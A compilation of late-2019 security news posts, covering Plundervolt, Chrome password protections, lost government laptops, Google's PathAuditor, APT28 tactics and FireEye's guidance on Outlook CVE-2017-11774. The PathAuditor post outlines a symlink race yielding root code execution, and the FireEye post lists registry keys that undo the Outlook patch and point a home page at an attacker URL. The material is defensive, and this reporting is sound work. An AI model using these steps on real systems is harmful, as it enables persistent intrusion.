Researchers at the University of Birmingham have identified a weakness in Intel’s processors: by 'undervolting' the CPU, Intel’s secure enclave technology becomes vulnerable to attack.
A little bit of undervolting can cause a lot of problems

Modern processors are being pushed to perform faster than ever before – and with this comes increases in heat and power consumption. To manage this, many chip manufacturers allow frequency and voltage to be adjusted as and when needed – known as ‘undervolting’ or ‘overvolting’. This is done through privileged software interfaces, such as a “model-specific register” in Intel Core processors.

An international team of researchers from the University of Birmingham’s School of Computer Science along with researchers from imec-DistriNet (KU Leuven) and Graz University of Technology has been investigating how these interfaces can be exploited in Intel Core processors to undermine the system’s security in a project called Plundervolt.

Results released today and accepted to IEEE Security & Privacy 2020, show how the team was able to corrupt the integrity of Intel SGX on Intel Core processors by controlling the voltage when executing enclave computations – a method used to shield sensitive computations for example from malware. This means that even Intel SGX's memory encryption and authentication technology cannot protect against Plundervolt.

Intel has already responded to the security threat by supplying a microcode update to mitigate Plundervolt. The vulnerability has a CVSS base score of 7.9. high under CVE-2019-11157.
David Oswald, Senior Lecturer in Computer Security at the University of Birmingham, says: “To our knowledge, the weakness we’ve uncovered will only affect the security of SGX enclaves. Intel responded swiftly to the threat and users can protect their SGX enclaves by downloading Intel’s update.”

Better password protections in Chrome – How it works



Today, we announced better password protections in Chrome, gradually rolling out with release M79. Here are the details of how they work.


Warnings about compromised passwords
Google first introduced password breach warnings as a Password Checkup extension early this year. It compares passwords and usernames against over 4 billion credentials that Google knows to have been compromised. You can read more about it here. In October, Google built the Password Checkup feature into the Google Account, making it available from passwords.google.com.

Chrome’s integration is a natural next step to ensure we protect even more users as they browse the web. Here is how it works:
  • Whenever Google discovers a username and password exposed by another company’s data breach, we store a hashed and encrypted copy of the data on our servers with a secret key known only to Google.
  • When you sign in to a website, Chrome will send a hashed copy of your username and password to Google encrypted with a secret key only known to Chrome. No one, including Google, is able to derive your username or password from this encrypted copy.
  • In order to determine if your username and password appears in any breach, we use a technique called private set intersection with blinding that involves multiple layers of encryption. This allows us to compare your encrypted username and password with all of the encrypted breached usernames and passwords, without revealing your username and password, or revealing any information about any other users’ usernames and passwords. In order to make this computation more efficient, Chrome sends a 3-byte SHA256 hash prefix of your username to reduce the scale of the data joined from 4 billion records down to 250 records, while still ensuring your username remains anonymous.
  • Only you discover if your username and password have been compromised. If they have been compromised, Chrome will tell you, and we strongly encourage you to change your password.
You can control this feature in the “Sync and Google Services” section of Chrome Settings. Enterprise admins can control this feature using the Password​Leak​Detection​Enabled policy setting.


Real-time phishing protection: Checking with Safe Browsing’s blocklist in real time.
Chrome’s new real-time phishing protection is also expanding existing technology — in this case it’s Google’s well-established Safe Browsing.

Every day, Safe Browsing discovers thousands of new unsafe sites and adds them to the blocklists shared with the web industry. Chrome checks the URL of each site you visit or file you download against this local list, which is updated approximately every 30 minutes. If you navigate to a URL that appears on the list, Chrome checks a partial URL fingerprint (the first 32 bits of a SHA-256 hash of the URL) with Google for verification that the URL is indeed dangerous. Google cannot determine the actual URL from this information.

However, we’re noticing that some phishing sites slip through our 30-minute refresh window, either by switching domains very quickly or by hiding from Google's crawlers.

That’s where real-time phishing protections come in. These new protections can inspect the URLs of pages visited with Safe Browsing’s servers in real time. When you visit a website, Chrome checks it against a list stored on your computer of thousands of popular websites that are known to be safe. If the website is not on the safe-list, Chrome checks the URL with Google (after dropping any username or password embedded in the URL) to find out if you're visiting a dangerous site. Our analysis has shown that this results in a 30% increase in protections by warning users on malicious sites that are brand new.

We will be initially rolling out this feature for people who have already opted-in to “Make searches and browsing better” setting in Chrome. Enterprises administrators can manage this setting via the Url​Keyed​Anonymized​Data​Collection​Enabled policy settings.


Expanding predictive phishing protection
Your password is the key to your online identity and data. If this key falls into the hands of attackers, they can easily impersonate you and get access to your data. We launched predictive phishing protections to warn users who are syncing history in Chrome when they enter their Google Account password into suspected phishing sites that try to steal their credentials.

With this latest release, we’re expanding this protection to everyone signed in to Chrome, even if you have not enabled Sync. In addition, this feature will now work for all the passwords you have stored in Chrome’s password manager.

If you type one of your protected passwords (this could be a password you stored in Chrome’s password manager, or the Google Account password you used to sign in to Chrome) into an unusual site, Chrome classifies this as a potentially dangerous event.

In such a scenario, Chrome checks the site against a list on your computer of thousands of popular websites that are known to be safe. If the website is not on the safe-list, Chrome checks the URL with Google (after dropping any username or password embedded in the URL). If this check determines that the site is indeed suspicious or malicious, Chrome will immediately show you a warning and encourage you to change your compromised password. If it was your Google Account password that was phished, Chrome also offers to notify Google so we can add additional protections to ensure your account isn't compromised.

By watching for password reuse, Chrome can give heightened security in critical moments while minimizing the data it shares with Google. We think predictive phishing protection will protect hundreds of millions more people.

MoJ Reports Over 400% Increase in Lost Laptops in Three Years

Apricorn, the leading manufacturer of software-free, 256-bit AES XTS hardware-encrypted USB drives, today announced new findings from Freedom of Information (FoI) requests submitted to five government departments into the security of devices held by public sector employees. The Ministry of Justice (MoJ) lost 354 mobile phones, PCs, laptops and tablet devices in FY 2018/19 compared with 229 between 2017/2018. The number of lost laptops alone, has risen from 45 in 2016/17 to 101 in 2017/18 and up to 201 in 2018/2019, an increase of more than 400% in three years.

FoI requests were submitted to the MoJ, Ministry of Education (MoE), Ministry of Defence (MoD), NHS Digital and NHS England during September-November 2019. Of the five government departments contacted, three out of five government departments responded. The MoE also reported 91 devices lost or stolen in 2019, whilst NHS Digital have lost 35 to date in 2019.

“Whilst devices are easily misplaced, it’s concerning to see such vast numbers being lost and stolen, particularly given the fact these are government departments ultimately responsible for volumes of sensitive public data. A lost device can pose a significant risk to the government if it is not properly protected” said Jon Fielding, Managing Director, EMEA, Apricorn.

When questioned about the use of USB and other storage devices in the workplace, or when working remotely, all three departments confirmed that employees use USB devices. The MoJ added that all USB ports on laptops and desktops are restricted and can only be used when individuals have requested that the ports be unlocked. Each of the responding departments noted that all USB and storage devices are encrypted.

“Modern-day mobile working is designed to support the flexibility and efficiency increasingly required in 21st-century roles, but this also means that sensitive data is often stored on mobile and laptop devices. If a device that is not secured is lost and ends up in the wrong hands, the repercussions can be hugely detrimental, even more so with GDPR now in full force”, noted Fielding.

In a survey by Apricorn earlier this year, roughly a third (32%) of respondents said that their organisation had already experienced a data loss or breach as a direct result of mobile working and to add to this, 30% of respondents from organisations where the General Data Protection Regulation (GDPR) applies were concerned that mobile working is an area that will most likely cause them to be non-compliant.

All responding sectors did confirm that they have security policies in place that cover all mobile, storage and laptop devices.

“Knowing that these government departments have policies in place to protect sensitive data is somewhat reassuring, however, they need to be doing a lot more to avoid the risk of a data breach resulting from these lost devices. Corporately approved, hardware encrypted storage devices should be provided as standard. These should be whitelisted on the IT infrastructure, blocking access to all non-approved media. Should a device then ‘go missing’ the data cannot be accessed or used inappropriately” Fielding added.

About the FoI Requests
The research was conducted through Freedom of Information requests submitted through Whatdotheyknow.com. The requests, submitted between September and November 2019, along with the successful responses can be found at: https://www.whatdotheyknow.com/list/successful.

Optiv Announces New Software Assurance as-a-Service Offering Powered by Veracode

In an effort to help drive collaboration between security, development, and operations, improve speed to market, and ensure software is secure from the start, Optiv has released its new Software Assurance as-a-Service (SAaaS) offering. This program pairs Optiv???s consulting and security services with Veracode???s cloud-based, end-to-end application security solutions to give companies a programmatic approach to DevSecOps.

In today???s world, every company is a software company and, as a result, one of the top attack vectors for software-driven and supported organizations is the application. Just as development teams are increasingly integrating automated security into their workflows, security teams are looking for support to plan, build, and run strong application security programs that deliver on the overarching goals of the business.

Through SAaaS, DevSecOps teams are assisted with detection, analysis, and response to application vulnerabilities with Veracode Static Analysis, Veracode Dynamic Analysis, and Veracode Software Composition Analysis. In order to ensure that the flaws aren???t just found, but also fixed, the Optiv SAaaS solution is inclusive of software assurance expertise for code review, threat modeling, SDLC workshops, architectural review, and program development.

Optiv SAaaS enables modern organizations of all sizes and maturity levels to take advantage of a highly scalable platform and seamless integration to build a customized AppSec program that delivers secure software faster. This offering can help companies empower their development and security teams, lower their security risk, and turn security into a competitive advantage.

Learn more here.

Detecting unsafe path access patterns with PathAuditor



#!/bin/sh
cat /home/user/foo


What can go wrong if this command runs as root? Does it change anything if foo is a symbolic link to /etc/shadow? How is the output going to be used?

Depending on the answers to the questions above, accessing files this way could be a vulnerability. The vulnerability exists in syscalls that operate on file paths, such as open, rename, chmod, or exec. For a vulnerability to be present, part of the path has to be user controlled and the program that executes the syscall has to be run at a higher privilege level. In a potential exploit, the attacker can substitute the path for a symlink and create, remove, or execute a file. In many cases, it's possible for an attacker to create the symlink before the syscall is executed.

At Google, we have been working on a solution to find these potentially problematic issues at scale: PathAuditor. In this blog post we'll outline the problem and explain how you can avoid it in your code with PathAuditor.

Let’s take a look at a real world example. The tmpreaper utility contained the following code to check if a directory is a mount point:
if ((dst = malloc(strlen(ent->d_name) + 3)) == NULL)
       message (LOG_FATAL, "malloc failed.\n");
strcpy(dst, ent->d_name);
strcat(dst, "/X");
rename(ent->d_name, dst);
if (errno == EXDEV) {
[...]


This code will call rename("/tmp/user/controlled", "/tmp/user/controlled/X"). Under the hood, the kernel will resolve the path twice, once for the first argument and once for the second, then perform some checks if the rename is valid and finally try to move the file from one directory to the other.

However, the problem is that the user can race the kernel code and replace the “/tmp/user/controlled” with a symlink just between the two path resolutions.

A successful attack would look roughly like this:
  • Make “/tmp/user/controlled” a file with controlled content.
  • The kernel resolves that path for the first argument to rename() and sees the file.
  • Replace “/tmp/user/controlled” with a symlink to /etc/cron.
  • The kernel resolves the path again for the second argument and ends up in /etc/cron.
  • If both the tmp and cron directories are on the filesystem, the kernel will move the attacker controlled file to /etc/cron, leading to code execution as root.
Can we find such bugs via automated analysis? Well, yes and no. As shown in the tmpreaper example, exploiting these bugs can require some creativity and it depends on the context if they’re vulnerabilities in the first place. Automated analysis can uncover instances of this access pattern and will gather as much information as it can to help with further investigation. However, it will also naturally produce false positives.

We can’t tell if a call to open(/user/controlled, O_RDONLY) is a vulnerability without looking at the context. It depends on whether the contents are returned to the user or are used in some security sensitive way. A call to chmod(/user/controlled, mode) depending on the mode can be either a DoS or a privilege escalation. Accessing files in sticky directories (like /tmp) can become vulnerabilities if the attacker found an additional bug to delete arbitrary files.

How Pathauditor works

To find issues like this at scale we wrote PathAuditor, a tool that monitors file accesses and logs potential vulnerabilities. PathAuditor is a shared library that can be loaded into processes using LD_PRELOAD. It then hooks all filesystem related libc functions and checks if the access is safe. For that, we traverse the path and check if any component could be replaced by an unprivileged user, for example if a directory is user-writable. If we detect such a pattern, we log it to syslog for manual analysis.

Here's how you can use it to find vulnerabilities in your code:
  • LD_PRELOAD the library to your binary and then analyse its findings in syslog. You can also add the library to /etc/ld.so.preload, which will preload it in all binaries running on the system.
  • It will then gather the PID and the command line of the calling process, arguments of the vulnerable function, and a stack trace -- this provides a starting point for further investigation. At this point, you can use the stack trace to find the code path that triggered the violation and manually analyse what would happen if you would point the path to an arbitrary file or directory.
  • For example, if the code is opening a file and returning the content to the user then you could use it to read arbitrary files. If you control the path of chmod or chown, you might be able to change the permissions of chosen files and so on.
PathAuditor has proved successful at Google and we're excited to share it with the community. The project is still in the early stages and we are actively working on it. We look forward to hearing about any vulnerabilities you discover with the tool, and hope to see pull requests with further improvements.

Try out the PathAuditor tool here.

Marta Rożek was a Google Summer intern in 2019 and contributed to this blog and the PathAuditor tool

Its Time to Help Defend Organizations Worldwide

Folks,

I trust this finds you all doing well. It has been a few months since I last blogged - pardon the absence. I had to focus my energies on helping the world get some perspective, getting 007G ready for launch, and dealing with a certain nuisance.

Having successfully accomplished all three objectives, it is TIME to help defend organizations worldwide from the SPECTRE of potentially colossal compromise, which is a real cyber security risk that looms over 85% of organizations worldwide.


When you know as much as I do, care as much as I do, and possess as much capability as I do, you not only shoulder a great responsibility, you almost have an obligation to educate the whole world about cyber security risks that threaten their security.

So, even though I barely have any time to do this, in the interest of foundational cyber security worldwide, I'm going to start sharing a few valuable perspectives again, and do so, on this blog, that blog and the official PD blog (;see below.)


Speaking of which, earlier this week, I had the PRIVILEGE to launch the official PD blog -  https://blog.paramountdefenses.com


Stay tuned for some valuable cyber security insights right here from January 06, 2020
and let me take your leave with a befitting (and one of my favorite) song(s) -



Best wishes,
Sanjay.


PS: Just a month ago, the $ Billion Czech cyber security company Avast was substantially compromised, and guess what the perpetrators used to compromise them? They used the EXACT means I had clearly warned about TWO years ago, right here.


DevSecOps Challenges From a Security Perspective

The transition from DevOps to DevSecOps requires security professionals to have a whole new understanding of development processes, priorities, tools, and painpoints. It???s no longer feasible for security professionals to get by with a superficial understanding of how developers work. But this understanding can be a significant undertaking for most security pros who haven???t had to be immersed in the development side of the house previously.

In its new report, Building an Enterprise DevSecOps Program, analyst firm Securosis notes of security teams and DevSecOps, ???Their challenge is to understand what development is trying to accomplish, integrate with them in some fashion, and ?ャ?gure out how to leverage automated security testing to be at least as agile as development.???

In this same paper, Securosis highlights the questions security professionals ask them most often surrounding DevSecOps, which include ???can we realistically modify developer behavior???? ???What tools do we start with to ???shift left?????? and ???how do we integrate security testing into the development pipeline???? These are all valid and important questions, but Securosis points out that there are also questions security teams should be asking, but aren???t, including:

  • How do we ?ャ?t ??? operationally and culturally ??? into DevSecOps?
  • How do we get visibility into Development and their practices?
  • How do we know changes are effective? What metrics should we collect and monitor?
  • How do we support Development?
  • Do we need to know how to code?

The questions the security team is currently asking are about security tasks in DevSecOps; the questions they aren???t asking are about how to understand and work with the development organization. And those are the questions they should start asking. Where to start? The key development areas security teams need to understand when trying to get a handle on application security include the following:

Process: At the very least understand why development processes have changed over the years, what they are trying to achieve, and make sure security testing embraces the same ideals.

Developer tools: You need to understand the tools developers use to manage the code they are building in order to understand where code can be inspected for security issues.

Code: Security tests are shifting left and looking at code, not fully developed applications. The traditional thinking about security audits needs to shift as well.

Open source: You would be hard-pressed to find an app that isn???t made up primarily of open source code. Understand why, and then work with the development team to help them continue to use open source code, but in a secure way.

How security tools affect developer processes: Make sure the security tools you select integrate with the tools and processes developers already use and don???t slow them down with false positives.

Cultural dynamics: You need to fully understand the development team???s goals and priorities ??? which are most often centered around speed. That understanding is key to getting developer buy-in and acceptance.

SDLC: It???s best practice to include some kind of security analysis in each phase of the software lifecycle. For instance, threat modeling during design, and software composition analysis during development. In this way, you establish a process-independent AppSec program that will work with varying development processes.

For more details on these development areas and practical advice on building an effective DevSecOps program, check out the full Securosis report.

Accelerated Digital Innovation to impact the Cybersecurity Threat Landscape in 2020

Its December and the Christmas lights are going up, so it can't be too early for cyber predictions for 2020.   With this in mind, Richard Starnes, Chief Security Strategist at Capgemini, sets out what the priorities will be for businesses in 2020 and beyond.


Accelerated digital innovation is a double-edged sword that will continue to hang over the cybersecurity threat landscape in 2020.  As businesses rapidly chase digital transformation and pursue the latest advancements in 5G, cloud and IoT, they do so at the risk of exposing more of their operations to cyber-attacks. These technologies have caused an explosion in the number of end-user devices, user interfaces, networks and data; the sheer scale of which is a headache for any cybersecurity professional. 

In order to aggressively turn the tide next year, cyber analysts can no longer avoid AI adoption or ignore the impact of 5G. 

AI Adoption
Hackers are already using AI to launch sophisticated attacks – for example AI algorithms can send ‘spear phishing’ tweets six times faster than a human and with twice the success. In 2020, by deploying intelligent, predictive systems, cyber analysts will be better positioned to anticipate the exponentially growing number of threats.

The Convergence of IT and OT
At the core of the Industry 4.0 trend is the convergence of operations technology (OT) and information technology (IT) networks, i.e. the convergence of industrial and traditional corporate IT systems. While this union of these formerly disparate networks certainly facilitates data exchange and enables organisations to improve business efficiency, it also comes with a host of new security concerns.

5G and IoT
While 5G promises faster speed and bandwidth for connections, it also comes with a new generation of security threats. 5G is expected to make more IoT services possible and the framework will no longer neatly fit into the traditional security models optimised for 4G. Security experts warn of threats related to the 5G-led IoT growth anticipated in 2020, such as a heightened risk of Distributed Denial-of-Service (DDoS) attacks.

Death of the Password
2020 could see organisations adopt new and sophisticated technologies to combat risks associated with weak passwords.

More Power to Data Protection Regulations
In 2020, regulations like GDPR, The California Consumer Privacy Act and PSD2 are expected to get harsher. We might also see announcements of codes of conduct specific to different business sectors like hospitality, aviation etc. All this will put pressure on businesses to make data security a top consideration at the board level.

APT28 Attacks Evolution

APT28 is a well known Russian cyber espionage group attributed, with a medium level of confidence, to Russian military intelligence agency GRU (by CrowdStrike). It is also known as Sofacy Group (by Kaspersky) or STRONTIUM (by Microsoft) and it’s used to target Aereospace, Defence, Governmente Agencies, International Organizations and Media.

Today I’d like to share some personal notes after few years of collected evidences and readings on that topic.

Attack Timeline

The following timeline tracks APT28 back to 2008 and gives us a quick view on how big and organized is the threat group over the past decade.

APT28 Timeline

According to the many analyses made by Unit42 (available HERE), FireEye (HERE, HERE) and TALOS (HERE, HERE ) we might agree that APT28 has been very active (or at least very “spotted”) during the time frame between 2012 to 2019. However most of the new attacks, qualitative speaking, happened during the time frame between 2018 to 2019. For that reason it would be interesting to analyze how they’ve evolved over such a time frame in order to understand their change and their principal characteristics. From what I’ve tracked and from what I’ve read over the past few years it looks like APT28 changed in many areas, but today I’d like to focus mostly on the following three main areas: Weaponization, Delivery, Installation. Let’s discuss one to one those areas.

Weaponization

Weaponization is a PRE-ATT&CK technique. It is classified as the operations needed to build and/or to prepare a complex attack. In other words all the infrastructures, the samples, the command and controls, the domains and IPs, the certificate, the libraries and, general speaking, all the operations that come before the attack phase in term of environments. Intelligence, humanInt, information gathering, informal test and so on, are not included in Weaponization since coming directly into the ATT&CK framework.

Weaponization Timeline

Observing the weaponization timeline it turns out there are three main blocks with few shared characteristics. For example from 2017 to early 2018 APT28 used specific techniques such as: T1251, T1329, T1336 and T1319. Those techniques are mainly focused on external – outsourcing (except for T1319) skills-set. Indeed acquiring 3rd parties infrastructures or Installing and configure hardware networks-systems and the usage of third party obfuscation libraries would definitely highlight a human resource depletion or the clear intent of false flag. On the other hand during early 2018 to mid-2018 the weaponization chain changed a lot moving to T1314, T1322 and to T1328. Those techniques enforced the idea the group moved from external professional resources and from hardware localized techniques to internal professional resources (indeed they started buy own domain for propagation and C2) . Finally from October 2018 to late march 2019 APT28 introduced a totally different weaponization technique: the T1345. It is not a direct consequence to the previous observed techniques, actually we might think they improved or forked an internal dev team. Those self-developing capabilities (implemented by T1345) were not observed during the past years and highlight a slightly significant change. We might think they enrolled a dedicated dev-team or they forked the actual one by running on two different paths.

Delivery

Delivery is the way attackers deploy the initial content to the victim. In other words how the adversary reach his victim by starting the infection chain. On one hand the delivery vector is often the only (or the first) artifact (such as: a Malware, a Link or exploit kit usage) that the cybersecurity analyst could observe. Unfortunately very often analysts don’t have the possibility to track every single attack phase but they can just observe a small “portion” of it, and very often that “portion” is the “delivered artifact”. Tracking the changes on Delivery would help cybersecurity analysts to build up the idea about threat actors by comparing likeness and differences in coding, styling and techniques. Indeed the delivery phase is a special key point to distinguish threat actors which usually tend to specialize their crafting capabilities over time rather than pivoting their capabilities on new delivery vectors. The following timeline shows how the delivery changed over the analyzed time frames.

Delivery Timeline

While in the previous section (weaponization section), three were the main macro blocks, in the delivery section everything looks like uniform and quite flat based on technique T1193: Spearphishing with a malicious attachment. But if we focus on the beginning of 2018 it looks like APT28 was using a more consolidated intelligence technique (T1376) by focusing on Human Intelligence in order to grab precious information used to deliver a well-crafted email campaign (government institutions related to foreign affairs). The delivery phase, at such time, was implementing a quite sophisticated dropper technology by exploiting vulnerabilities to “save and run” the payload in the desired place. The most exploited vulnerabilities by APT28 have been tracked as follows:

CVE-2017-0144 , CVE-2013-3897, CVE-2014-1776, CVE-2012-0158, CVE-2015-5119, CVE-2013-3906, CVE-2015-7645, CVE-2015-2387, CVE-2010-3333, CVE-2015-1641, CVE-2013-1347, CVE-2015-3043, CVE-2015-1642, CVE-2015-2590, CVE-2015-1701, CVE-2015-4902, CVE-2017-0262, CVE-2017-0263
CVE-2014-4076, CVE-2014-0515

The most used tracked vulnerabilities are mainly focused on: “Windows”, “Adobe Flash” and “Oracle” Technologies. During the past few months (almost one year from time writing) it was possible to observe a quick increment over Microsoft Office Vulnerabilities in order to drop second stages of payloads. This perfectly fits the new trend and the current infection chains.

Installation

While system persistence could be guaranteed in many different ways, for example by periodically exploiting a RCE vulnerability, persistence in case of Malware attacks is typically named: “Installation”. Since the main findings that I had analyzed for this post are Malware based, it makes sense to talk about Installation rather than talking about persistence. Moreover the installation procedure runs a key role into the infection chain. Observing the installation KPI would be meaningful to understand the developer team behind software, since developer teams do not like to change installation procedures over time because they used to focus on new features and/or to improve existing modules rather than change installation frameworks. The following timeline shows how Installation procedures changed over time on APT28 folks.

Installation Timeline

The observed time frame is focused on the past year since where the most interesting changes happened, at least in my personal opinion. Let’s start by observing that in early 2018 the most used techniques were: T1055, T1045, T1064, T1158 and T1037. Most of the used techniques belong to the “Scripting” world. In other words the most influential capabilities were based on Logon Scripts and JS/WB scripintg. From ~mid 2018 they group moves mostly on PowerShell scripting language (T1086 and T1140) widely used over the past two years (rif. HERE) ending up in early 2019 to advanced development techniques such as: T1221, T1204, T1045, T1047, T1112, which underline a quite interesting new develpment skillset.

Conclusions

As many groups are, APT28 is evolving over time. The group evolution is changing many TTPs (Tactics, Techniques and Procedures) but this time I decided to focus on: Installation, Delivery and Weaponization. Most of the tracked evolution indexes happened during the last one/two years showing a quick skill-sets enhancement on development, obfuscation and evasion techniques.

Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774)

Attackers have a dirty little secret that is being used to conduct big intrusions. We’ll explain how they're "unpatching" an exploit and then provide new Outlook hardening guidance that is not available elsewhere. Specifically, this blog post covers field-tested automated registry processing for registry keys to protect against attacker attempts to reverse Microsoft’s CVE-2017-11774 patch functionality.

Despite multiple warnings from FireEye and U.S. Cyber Command, we have continued to observe an uptick in successful exploitation of CVE-2017-11774, a client-side Outlook attack that involves modifying victims’ Outlook client homepages for code execution and persistence. The Outlook Home Page feature allows for customization of the default view for any folder in Outlook. This configuration can allow for a specific URL to be loaded and displayed whenever a folder is opened. This URL is retrieved either via HTTP or HTTPS - and can reference either an internal or external network location. When Outlook loads the remote URL, it will render the contents using the Windows DLL ieframe.dll, which can allow an attacker to achieve remote code execution that persists through system restarts.

We have observed multiple threat actors adopting the technique and eventually becoming a favorite for Iranian groups in support of both espionage and reportedly destructive attacks. FireEye first observed APT34 use CVE-2017-11774 in June 2018, followed by adoption by APT33 for a significantly broader campaign beginning in July 2018 and continuing for at least a year. To further increase awareness of this intrusion vector, our Advanced Practices team worked with MITRE to update the ATT&CK framework to include CVE-2017-11774 home page persistence within technique T1137 – “Office Application Startup”.

For more information on how CVE-2017-11774 exploitation works, how APT33 implemented it alongside password spraying, and some common pitfalls for incident responders analyzing this home page technique, see the “RULER In-The-Wild” section of our December 2018 OVERRULED blog post.

Going Through a Rough Patch

On October 10, 2017, Microsoft released patches for Microsoft Outlook to protect against this technique.

  • KB4011196 (Outlook 2010)
  • KB4011178 (Outlook 2013)
  • KB4011162 (Outlook 2016)

Following the mid-2018 abuse by Iranian threat actors first detailed in our OVERRULED blog post, the FireEye Mandiant team began to raise awareness of how the patch could be subverted. Doug Bienstock discussed in December 2018 that the simple roll back of the patch as a part of Mandiant’s Red Team operations – and alluded to observing authorized software that also automatically removes the patch functionality. In response to U.S. Cyber Command’s mid-2019 warning about APT33’s use of the exploit, we raised concern with DarkReading over the ability to override the CVE-2017-11774 patch without escalated privileges.

Without continuous reinforcement of the recommended registry settings for CVE-2017-11774 hardening detailed within this blog post, an attacker can add or revert registry keys for settings that essentially disable the protections provided by the patches.

An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. The “URL” subkey will enable and set a home page for the specified mail folder within the default mailbox. Setting this registry key to a valid URL enables the home page regardless of the patch being applied or not. Although the option will not be accessible from the Outlook user interface (UI), it will still be set and render. Importantly, these keys are set within the logged-on user’s Registry hive. This means that no special privileges are required to edit the Registry and roll back the patch. The FireEye Red Team found that no other registry modifications were required to set a malicious Outlook homepage.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\ Outlook\WebView\Inbox
“URL”= http://badsite/homepage-persist.html

There are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe options in Outlook. The following setting can be used to re-enable the original home page tab and roaming home page behavior in the Outlook UI.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
“EnableRoamingFolderHomepages”= dword:00000001

The following setting will allow for folders within secondary (non-default) mailboxes to leverage a custom home page.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
“NonDefaultStoreScript"= dword:00000001

The following setting will allow for “Run as a Script” and “Start Application” rules to be re-enabled.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
“EnableUnsafeClientMailRules"= dword:00000001

Etienne Stalmans, a developer of SensePost’s RULER and the credited responsible discloser of CVE-2017-11774, chimed in about similar concerns on the patch that were re-raised after seeing a September 2018 blog post about applying the same technique to Outlook Today’s home page that is stored at HKCU\Software\Microsoft\Office\<Outlook Version>\Outlook\Today\UserDefinedUrl. Both Etienne and the September 2018 blog post’s author describe what Microsoft has suggested as a key mitigating factor – that the exploit and rolling back the patch require some form of initial access. This is consistent with Microsoft’s position and their 2007 immutable laws of security blog, which were reiterated when we contacted MSRC prior to publishing this blog post.

We agree that for the CVE-2017-11774 patch override vector to be successful, a bad guy has to persuade you to run his program (law #1) and alter your operating system (law #2). However, the technique is under-reported, no public mitigation guidance is available, and – as a fresh in-the-wild example demonstrates in this post – that initial access and patch overriding can be completely automated.

A Cavalier Handling of CVE-2017-11774

The Advanced Practices team monitors for novel implementations of attacker techniques including this patch override, and on November 23, 2019 a uniquely automated phishing document was uploaded to VirusTotal. The sample, “TARA Pipeline.xlsm” (MD5: ddbc153e4e63f7b8b6f7aa10a8fad514), launches malicious Excel macros combining several techniques, including:

  • execution guardrails to only launch on the victim domain (client redacted in screenshot)
  • custom pipe-delimited character substitution obfuscation
  • a creative implementation of CVE-2017-11774 using the lesser-known HKCU\Software\Microsoft\Office\<Outlook Version>\Outlook\WebView\Calendar\URL registry key
  • a URL pointing to the payload hosted in Azure storage blobs (*.web.core.windows.net) – a creative technique that allows an attacker-controlled, swappable payload to be hosted in a legitimate service
  • and most importantly for this blog post – a function to walk through the registry and reverse the CVE-2017-11774 patch functionality for any version of Microsoft Outlook

These features of the malicious spear phishing Excel macro can be seen in Figure 1.


Figure 1: Malicious macros automatically reverting the CVE-2017-11774 patch

Pay special attention to the forced setting of EnableRoamingFolderHomepages to “1” and the setup of “Calendar\URL” key to point to an attacker-controlled payload, effectively disabling the CVE-2017-11774 patch on initial infection.

In support of Managed Defense, our Advanced Practices team clusters and tactically attributes targeted threat activity – whether the intrusion operators turn out to be authorized or unauthorized – in order to prioritize and deconflict intrusions. In this case, Nick Carr attributed this sample to an uncategorized cluster of activity associated with authorized red teaming, UNC1194 , but you might know them better as the TrustedSec red team whose founder, Dave Kennedy, appeared on a previous episode of State of the Hack. This malicious Excel file appears to be a weaponized version of a legitimate victim-created document that we also obtained – reflecting a technique becoming more common with both authorized and unauthorized intrusion operators. For further analysis and screenshots of UNC1194’s next stage CVE-2017-11774 payload for initial reconnaissance, target logging visibility checks, and domain-fronted Azure command and control – see here. Readers should take note that the automated patch removal and home page exploitation establishes attacker-controlled remote code execution and allows these [thankfully authorized] attackers to conduct a full intrusion by swapping out their payload remotely for all follow-on activity.

Locking Down the Registry Keys Using Group Policy Object (GPO) Enforcement

As established, the patches for CVE-2017-11774 can be effectively “disabled” by modifying registry keys on an endpoint with no special privileges. The following registry keys and values should be configured via Group Policy to reinforce the recommended configurations in the event that an attacker attempts to reverse the intended security configuration on an endpoint to allow for Outlook home page persistence for malicious purposes.

To protect against an attacker using Outlook’s WebView functionality to configure home page persistence, the following registry key configuration should be enforced.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\WebView
"Disable"= dword:00000001

Note: Prior to enforcing this hardening method for all endpoints, the previous setting should be tested on a sampling of endpoints to ensure compatibility with third-party applications that may leverage webviews.

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Hive: HKEY_CURRENT_USER
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Webview
        • Value Name: Disable
      • Value Type: REG_DWORD
      • Value Data: 00000001


Figure 2: Disabling WebView registry setting

Included within the Microsoft Office Administrative Templates, a GPO setting is available which can be configured to disable a home page URL from being set in folder properties for all default folders, or for each folder individually.  If set to “Enabled”, the following GPO setting essentially enforces the same registry configuration (disabling WebView) as previously noted.

User Configuration > Policies > Administrative Templates > Microsoft Outlook <version> > Folder Home Pages for Outlook Special Folders > Do not allow Home Page URL to be set in folder Properties

The registry key configuration to disable setting an Outlook home page via the Outlook UI is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"EnableRoamingFolderHomepages"= dword:00000000

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Hive: HKEY_CURRENT_USER
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: EnableRoamingFolderHomepages
      • Value Type: REG_DWORD
      • Value Data: 00000000


Figure 3: EnableRoamingFolderHomepages registry setting

Additionally, a home page in Outlook can be configured for folders in a non-default datastore. This functionality is disabled once the patch has been installed, but it can be re-enabled by an attacker. Just like this blog post’s illustration of several different home page URL registry keys abused in-the-wild – including the Outlook Today setting from September 2018 and the Calendar URL setting from UNC1194’s November 2019 malicious macros – these non-default mailstores provide additional CVE-2017-11774 attack surface.

The registry key configuration to enforce the recommended registry configuration is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"NonDefaultStoreScript"= dword:00000000

